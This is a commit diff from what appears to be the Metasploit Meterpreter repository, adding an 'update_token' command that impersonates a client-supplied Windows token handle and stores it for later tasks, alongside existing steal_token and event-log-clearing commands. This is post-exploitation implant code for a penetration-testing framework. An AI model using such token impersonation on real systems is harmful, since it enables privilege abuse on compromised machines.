Land #648, Add update_token function to stdapi

rapid7 · Jun 2, 2023 · 5d6a9ea · 5d6a9ea
2 parents 90910db + bdd2885
commit 5d6a9ea
Show file tree

Hide file tree

Showing 4 changed files with 36 additions and 0 deletions.
diff --git a/c/meterpreter/source/common/common_command_ids.h b/c/meterpreter/source/common/common_command_ids.h
@@ -115,6 +115,7 @@
 #define COMMAND_ID_STDAPI_SYS_CONFIG_REV2SELF 1057
 #define COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN 1058
 #define COMMAND_ID_STDAPI_SYS_CONFIG_SYSINFO 1059
+#define COMMAND_ID_STDAPI_SYS_CONFIG_UPDATE_TOKEN 1120
 #define COMMAND_ID_STDAPI_SYS_EVENTLOG_CLEAR 1060
 #define COMMAND_ID_STDAPI_SYS_EVENTLOG_CLOSE 1061
 #define COMMAND_ID_STDAPI_SYS_EVENTLOG_NUMRECORDS 1062

diff --git a/c/meterpreter/source/extensions/stdapi/server/stdapi.c b/c/meterpreter/source/extensions/stdapi/server/stdapi.c
@@ -112,6 +112,7 @@ Command customCommands[] =
 	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_STEAL_TOKEN, request_sys_config_steal_token),
 	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_DROP_TOKEN, request_sys_config_drop_token),
 	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_GETSID, request_sys_config_getsid),
+	COMMAND_REQ(COMMAND_ID_STDAPI_SYS_CONFIG_UPDATE_TOKEN, request_sys_config_update_token),
 
 	// Net
 	COMMAND_REQ(COMMAND_ID_STDAPI_NET_CONFIG_GET_ROUTES, request_net_config_get_routes),

diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/config/config.c b/c/meterpreter/source/extensions/stdapi/server/sys/config/config.c
@@ -274,6 +274,39 @@ DWORD request_sys_config_drop_token(Remote* pRemote, Packet* pPacket)
 	return dwResult;
 }
 
+/*
+ * @brief Updates an existing thread token.
+ * @param pRemote Pointer to the \c Remote instance.
+ * @param pRequest Pointer to the \c Request packet.
+ * @returns Indication of success or failure.
+ */
+DWORD request_sys_config_update_token(Remote* pRemote, Packet* pPacket)
+{
+	Packet* pResponse = met_api->packet.create_response(pPacket);
+	DWORD dwResult = ERROR_SUCCESS;
+	HANDLE hToken = NULL;
+
+	// Get token handle from the client
+	hToken = (HANDLE)met_api->packet.get_tlv_value_qword(pPacket, TLV_TYPE_HANDLE);
+
+	// Impersonate token in the current thread
+	if (!ImpersonateLoggedOnUser(hToken))
+	{
+		dwResult = GetLastError();
+		dprintf("[UPDATE-TOKEN] Failed to impersonate token (%u)", dwResult);
+		met_api->packet.transmit_response(dwResult, pRemote, pResponse);
+		return dwResult;
+	}
+
+	// Store the token handle for future tasks
+	met_api->thread.update_token(pRemote, hToken);
+
+	// Empty response means success
+	met_api->packet.transmit_response(dwResult, pRemote, pResponse);
+
+	return dwResult;
+}
+
 /*
  * sys_getprivs
  * ----------

diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/config/config.h b/c/meterpreter/source/extensions/stdapi/server/sys/config/config.h
@@ -11,5 +11,6 @@ DWORD request_sys_config_getprivs(Remote *remote, Packet *packet);
 DWORD request_sys_config_steal_token(Remote *remote, Packet *packet);
 DWORD request_sys_config_drop_token(Remote *remote, Packet *packet);
 DWORD request_sys_config_driver_list(Remote *remote, Packet *packet);
+DWORD request_sys_config_update_token(Remote* pRemote, Packet* pPacket);
 
 #endif